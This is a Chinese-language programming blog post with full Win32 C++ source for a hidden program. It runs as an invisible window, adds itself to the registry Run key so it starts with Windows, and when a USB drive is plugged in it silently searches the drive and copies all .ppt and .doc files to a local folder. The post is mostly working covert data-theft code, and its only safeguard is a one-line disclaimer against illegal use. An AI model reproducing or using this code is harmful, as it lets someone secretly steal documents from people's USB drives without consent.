重点就是U盘插入监控,获得U盘盘符,开机自启动,文件扫描和复制。
1.对u盘插入行为监控,并获得盘符
当U盘插入的时候会产生一个消息WM_DEVICECHANG,只要我们获得这个消息,然后进行处理就行。
为了获得消息,我们需要一个窗口
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("UUUUUU"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = 0; wndclass.lpfnWndProc = WndProc; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = 0; wndclass.hCursor = 0; wndclass.hbrBackground = 0; wndclass.lpszMenuName = NULL; wndclass.lpszClassName = szAppName; SetAutoRun(TRUE); if (!RegisterClass(&wndclass)) { MessageBox(NULL, TEXT("Program requires Windows NT!"), szAppName, MB_ICONERROR); return 0; } hwnd = CreateWindow(szAppName, NULL, WS_DISABLED, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; }
窗口回调函数:
LRESULT CALLBACK WndProc(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_CREATE: //处理一些要下面要用到的全局变量 U[1] = ‘:‘; SetTimer(hwnd, TIMER, 5000, 0);//启动计时器 return 0; case WM_TIMER: //timer message SendMessage(hwnd, WM_DEVICECHANGE, 0, 0);//检测有没有插入设备消息 return 0; case WM_DEVICECHANGE: OnDeviceChange(hwnd, wParam, lParam); return 0; case WM_DESTROY: KillTimer(hwnd, TIMER); PostQuitMessage(0); return 0; } return DefWindowProc(hwnd, message, wParam, lParam); }
OnDeviceChange函数是对WM_DEVICECHANGE消息的处理,在这个函数里,就可以实现对u盘插入行为的监控,并处理。
LRESULT OnDeviceChange(HWND hwnd, WPARAM wParam, LPARAM lParam) { PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam; switch (wParam) { case DBT_DEVICEARRIVAL: //插入 if (lpdb->dbch_devicetype == DBT_DEVTYP_VOLUME) { PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb; U[0] = FirstDriveFromMask(lpdbv->dbcv_unitmask);//得到u盘盘符 //MessageBox(0, U, "Notice!", MB_OK); string Utemp; Utemp = U; // Utemp += "\\"; Filesearch(Utemp, 0); //搜索u盘 CopyPPT(FileList); //复制ppt CopyDOC(FileList); //复制doc //MessageBox(0, "Copy Success", "Notice!", MB_OK); } break; case DBT_DEVICEREMOVECOMPLETE: //设备删除 //MessageBox(0, "u盘退出", "Notice!", MB_OK); break; } return LRESULT(); }
FirstDriveFromMask(lpdbv->dbcv_unitmask);可以获得盘符,有了盘符,U盘就相当于一个普通的文件夹了。 2.文件遍历 查找 搜索 复制
void Filesearch(string Path, int Layer) { FileInfo FileInfomation; struct _finddata_t filefind; string Current = Path + "\\*.*"; // 修改此处改变搜索条件 int Done = 0, i, Handle; string FullPath; if ((Handle = _findfirst(Current.c_str(), &filefind)) != -1) { while (!(Done = _findnext(Handle, &filefind))) { if (strcmp(filefind.name, "..") == 0) continue; for (i = 0; i <Layer; i++) printf("\t"); if ((_A_SUBDIR == filefind.attrib)) // 是目录 { printf("[Dir]:\t%s\n", filefind.name); Current = Path + "\\" + filefind.name; Filesearch(Current, Layer + 1); // 递归遍历子目录 } else { printf("[File]:\t%s\n", filefind.name); FullPath = Path + "\\" + filefind.name; FileInfomation.Name = filefind.name; FileInfomation.FullPath = FullPath; FileList.push_back(FileInfomation); FullPath.empty(); } } _findclose(Handle); } } void CopyPPT(vector<FileInfo> FileList) { mkdir("C:\\Destest"); for (auto iterator = FileList.cbegin(); iterator != FileList.cend(); ++iterator) { string TempPath; //printf("%s\r\n", iterator->); if ((int)(iterator->Name.find(".ppt")) > 0) { TempPath = DesPath + "\\" + iterator->Name ; BOOL bOk = CopyFileA(iterator->FullPath.c_str(), TempPath.c_str(), false); cout << GetLastError(); if (bOk == TRUE) { // MessageBox(0, "Copy Success", "Notice!", MB_OK); } else { // MessageBox(0, "Copy Fail", "Notice!", MB_OK); } } } } void CopyDOC(vector<FileInfo> FileList) { mkdir("C:\\Destest"); for (auto iterator = FileList.cbegin(); iterator != FileList.cend(); ++iterator) { string TempPath; //printf("%s\r\n", iterator->); if ((int)(iterator->Name.find(".doc")) > 0) { TempPath = DesPath + "\\" + iterator->Name; BOOL bOk = CopyFileA(iterator->FullPath.c_str(), TempPath.c_str(), false); cout << GetLastError(); if (bOk == TRUE) { // MessageBox(0, "Copy Success", "Notice!", MB_OK); } else { // MessageBox(0, "Copy Fail", "Notice!", MB_OK); } } } }
3.开机自启动 注册表实现
void SetAutoRun(BOOL bAutoRun) { HKEY hKey; char* strRegPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";//找到系统的启动项 if (bAutoRun) { if (RegOpenKeyEx(HKEY_CURRENT_USER, strRegPath, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) //打开启动项 { TCHAR szModule[_MAX_PATH]; GetModuleFileName(NULL, szModule, _MAX_PATH);//得到本程序自身的全路径 RegSetValueEx(hKey, "U盘检测", 0, REG_SZ, (const BYTE*)(LPCSTR)szModule, strlen(szModule)); //添加一个子Key,并设置值,"Client"是应用程序名字(不加后缀.exe) RegCloseKey(hKey); //关闭注册表 } else { // MessageBox("系统参数错误,不能随系统启动"); } } else { if (RegOpenKeyEx(HKEY_CURRENT_USER, strRegPath, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { RegDeleteValue(hKey, "U盘检测"); RegCloseKey(hKey); } } }
Win10下可以实现功能,另外这不是控制台程序,为了实现对消息的监控,这得是窗口程序。
猥琐的小程序可能包含一些奇淫技巧,但是还是不能做非法不道德事。
时间: 2024-10-12 19:53:11